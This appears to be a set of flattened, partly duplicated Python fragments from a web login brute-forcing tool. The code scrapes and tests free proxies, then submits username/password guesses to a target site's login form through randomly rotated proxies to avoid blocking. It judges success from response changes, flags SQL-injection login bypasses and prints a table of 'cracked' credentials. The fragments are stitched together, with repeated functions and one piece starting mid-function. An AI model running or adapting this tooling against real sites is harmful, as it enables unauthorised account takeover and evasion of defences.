def checProxyConn(proxyAddr, target, result, verbose): try: proxyTest = Browser() proxyTest.set_random_proxy(proxyAddr) if verbose: events.info("Testing %s" % (proxyAddr)) proxyTest.open_url(target) if verbose: events.success("Connected via %s" %(proxyAddr), "PROXY") result.put(proxyAddr) except KeyboardInterrupt: events.error("Terminated by user", "STOPPED") global set_break set_break = True except Exception as error: if verbose: events.error("[%s] [%s]" % (proxyAddr, error)) finally: try: proxyTest.close() except: pass
def checkProxyConnProvider(url = "https://free-proxy-list.net/"): try: events.info("Gathering proxies from %s" % (url)) getproxy = Browser() getproxy.open_url(url) events.success("Gathering proxies completed", "PROXY") return getproxy.get_response() except Exception as error: events.error("%s" % (error), "PROXY") sys.exit(1) finally: getproxy.close()
def getnew(options): def parse_proxy(response): try: re_ip = r"\b(?:\d{1,3}\.){3}\d{1,3}\b<\/td><td>\d{1,5}" result = re.findall(re_ip, response) result = [element.replace("</td><td>", ":") for element in result] return result except Exception as error: events.error("%s" % (error), "PROXY") def checkProxyConnProvider(url = "https://free-proxy-list.net/"): try: events.info("Gathering proxies from %s" % (url)) getproxy = Browser() getproxy.open_url(url) events.success("Gathering proxies completed", "PROXY") return getproxy.get_response() except Exception as error: events.error("%s" % (error), "PROXY") sys.exit(1) finally: getproxy.close() try: listproxy = parse_proxy(checkProxyConnProvider()) except Exception as error: events.error("%s" % (error), "PROXY") listproxy = "" finally: try: events.success("Gathered %s proxies" % (len(listproxy)), "PROXY") listproxy = "\n".join(listproxy) events.info("Saving result to %s" %(PROXY_PATH), "PROXY") file_write(PROXY_PATH, listproxy) events.success("New proxy list saved", "PROXY") except Exception as error: events.error("%s" % (error), "PROXY") sys.exit(1)
def check(options): def run_threads(threads, sending, completed, total): # Run threads for thread in threads: # sending += 1 # Sending progressbar.progress_bar(sending, completed, total) thread.start() # Wait for threads completed for thread in threads: completed += 1 progressbar.progress_bar(sending, completed, total) thread.join() return completed def checProxyConn(proxyAddr, target, result, verbose): try: proxyTest = Browser() proxyTest.set_random_proxy(proxyAddr) if verbose: events.info("Testing %s" % (proxyAddr)) proxyTest.open_url(target) if verbose: events.success("Connected via %s" %(proxyAddr), "PROXY") result.put(proxyAddr) except KeyboardInterrupt: events.error("Terminated by user", "STOPPED") global set_break set_break = True except Exception as error: if verbose: events.error("[%s] [%s]" % (proxyAddr, error)) finally: try: proxyTest.close() except: pass try: proxylist = file_read(PROXY_PATH).split("\n") workers = [] completed, total = 0, len(proxylist) set_break = False for trying, tryProxy in enumerate(proxylist): if set_break: del workers[:] break if len(workers) == options.threads: completed = run_threads(workers, trying, completed, total) del workers[:] worker = threading.Thread( target = checProxyConn, args = (tryProxy, options.url, result, options.verbose) ) worker.daemon = True workers.append(worker) completed = run_threads(workers, trying, completed, total) del workers[:] except Exception as error: events.error("%s" % (error), "PROXY") sys.exit(1) finally: try: _data = "\n".join(list(result.queue)) events.success("%s proxy alive" %(len(_data.split("\n")))) events.info("Saving success list", "PROXY") file_write(LIVE_PATH, _data) events.success("New alive list is saved", "PROXY") except Exception as error: events.error("%s" % (error), "PROXY") sys.exit(1)
result = attack(options, loginInfo) if result: for _result in result: results.append(_result) # results.append(result) else: events.error("No login request found") if "--reauth" in options.extras: from extras import reauth reauth.run(options, result) except Exception as error: traceback.print_exc() events.error("%s" % (error), "STOPPED") sys.exit(1) finally: runtime = time.time() - runtime try: if len(options.target) > 0: if len(results) > 0 and len(options.target) > 1: events.success("Cracked %s target[s]" % (len(results)), "RESULT") utils.print_table(("URL", "Username", "Password"), *results) else: events.error("No target has been cracked", "RESULT") except: pass events.success("Elapsed: %0.2f [-] %s" % (runtime, time.strftime("%Y-%m-%d %H:%M")))
def submit(options, login_field, tryCred, result): password, username = tryCred if username in [x[1] for x in list(result.queue)]: return True from cores.browser import Browser isLoginSuccess = "False" try: proc = Browser() if options.proxy: # Set proxy connect proxy_address = list_choose_randomly(options.proxy) proc.set_random_proxy(proxy_address) else: proxy_address = "" proc.open_url(options.url) _form = find_login_form(proc.forms()) if not _form: options.block_text = proc.get_response( ) # TODO check if block text changes if options.verbose: isLoginSuccess = "blocked" events.error("Get blocked", "BRUTE") return False else: form_control, form_fields = _form if options.verbose and login_field != _form: events.info("Login form has been changed", "BRUTE") resp = proc.form_submit(form_control, form_fields, tryCred) from cores.analysis import get_response_diff text_changed, source_changed = get_response_diff( options.txt.decode('utf-8'), resp.content.decode('utf-8')) """ If there is no other login form, check all changes in response If there is no login request from all new urls -> successfully == > Behavior: Login fail, click here or windows.location = login_page """ # "Login form is still there. Oops" if find_login_form(proc.forms()): isLoginForm = True else: isLoginForm = False if not isLoginForm: for new_url in get_redirection(source_changed): if not new_url.startswith("http") and not new_url.endswith( options.exceptions()): try: from urllib.parse import urljoin except ImportError: from urlparse import urljoin new_url = urljoin(options.url, new_url) if new_url and get_domain(options.url) == get_domain(new_url): proc.open_url(new_url) if find_login_form(proc.forms()): isLoginForm = True break else: isLoginForm = False if not isLoginForm: """ Check SQL Injection 1. SQL Injection 2. Login successfully: No SQLi + No Login form """ if check_sqlerror(proc.get_response()): isLoginSuccess = "SQLi" elif text_changed == source_changed and text_changed != options.block_text and options.block_text: pass else: if resp.status_code >= 400: isLoginSuccess = "error" else: isLoginSuccess = "True" # "If we tried login form with username+password field" else: pass return True except Exception as error: """ Sometimes, web servers return error code because of bad configurations, but our cred is true. This code block showing information, for special cases """ isLoginSuccess = "exception" events.error("%s" % (error), "BRUTE") finally: if isLoginSuccess == "SQLi": events.success("SQL Injection bypass", "BRUTE") events.info("['%s': '%s']" % (username, password)) elif isLoginSuccess == "error" and options.verbose: if username: events.error( "['%s':'%s'] <--> %s" % (username, password, proxy_address), "%s" % (resp.status_code)) else: events.error("[%s] <--> %s" % (password, proxy_address), "%s" % (resp.status_code)) elif isLoginSuccess == "True": if username: events.found(username, password, proc.get_title()) result.put([options.url, username, password]) else: events.found('', password, proc.get_title()) result.put([options.url, username, password]) elif isLoginSuccess == "False" and options.verbose: if username: events.fail( "['%s':'%s'] <==> %s" % (username, password, proxy_address), text_changed, proc.get_title()) else: events.fail("['%s'] <==> %s" % (password, proxy_address), text_changed, proc.get_title()) proc.close()